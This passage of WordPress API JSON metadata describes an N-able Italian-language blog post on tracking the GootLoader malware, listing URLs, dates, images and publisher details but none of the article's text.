GootLoader","datePublished":"2022-09-30T15:58:32+01:00","dateModified":"2025-08-28T09:38:28+00:00","mainEntityOfPage":{"@id":"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader"},"wordCount":1547,"publisher":{"@id":"https:\/\/www.n-able.com\/it\/#organization"},"image":{"@id":"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader#primaryimage"},"thumbnailUrl":"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_1.png","inLanguage":"it-IT"},{"@type":"WebPage","@id":"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader","url":"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader","name":"Everything you Need to Know about Tracking GootLoader - N-able","isPartOf":{"@id":"https:\/\/www.n-able.com\/it\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader#primaryimage"},"image":{"@id":"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader#primaryimage"},"thumbnailUrl":"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_1.png","datePublished":"2022-09-30T15:58:32+01:00","dateModified":"2025-08-28T09:38:28+00:00","description":"GootLoader malware targets US firms with Cobalt Strike payloads, enabling access-as-a-service attacks. Discover campaign insights and protection tips.","inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/www.n-able.com\/it\/blog\/everything-you-need-to-know-about-tracking-gootloader#primaryimage","url":"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_1.png","contentUrl":"https:\/\/adlumin.wpenginepowered.com\/wp-content\/uploads\/GootLoader_Image_1.png"},{"@type":"WebSite","@id":"https:\/\/www.n-able.com\/it\/#website","url":"https:\/\/www.n-able.com\/it\/","name":"N-able","description":"","publisher":{"@id":"https:\/\/www.n-able.com\/it\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.n-able.com\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Organization","@id":"https:\/\/www.n-able.com\/it\/#organization","name":"N-able","url":"https:\/\/www.n-able.com\/it\/","logo":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/www.n-able.com\/it\/#\/schema\/logo\/image\/","url":"https:\/\/www.n-able.com\/wp-content\/uploads\/2021\/02\/logo-n-able-vertical-dark.svg","contentUrl":"https:\/\/www.n-able.com\/wp-content\/uploads\/2021\/02\/logo-n-able-vertical-dark.svg","width":"1024","height":"1024","caption":"N-able"},"image":{"@id":"https:\/\/www.n-able.com\/it\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/NableMSP","https:\/\/x.com\/Nable","https:\/\/www.linkedin.com\/company\/n-able","https:\/\/www.youtube.com\/channel\/UClnp77HHg4aME-S-3fWQhFw"]},{"@type":"Person","@id":"https:\/\/www.n-able.com\/it\/#\/schema\/person\/f46a000e389b6d02bd4b3866e7828a7b","name":"N-able","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/secure.gravatar.com\/avatar\/e9c468b7c98137ecdd5508befa660c205a7978133257080a37fb0b1362d53411?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/e9c468b7c98137ecdd5508befa660c205a7978133257080a37fb0b1362d53411?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e9c468b7c98137ecdd5508befa660c205a7978133257080a37fb0b1362d53411?s=96&d=mm&r=g","caption":"N-able"}}]}},"_links":{"self":[{"href":"https:\/\/www.n-able.com\/it\/wp-json\/wp\/v2\/posts\/70310","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.n-able.com\/it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.n-able.com\/it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.n-able.com\/it\/wp-json\/wp\/v2\/users\/24"}],"replies":[{"embeddable":true,"href":"https:\/\/www.n-able.com\/it\/wp-json\/wp\/v2\/comments?post=70310"}],"version-history":[{"count":0,"href":"https:\/\/www.n-able.com\/it\/wp-json\/wp\/v2\/posts\/70310\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.n-able.com\/it\/wp-json\/wp\/v2\/media?parent=70310"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}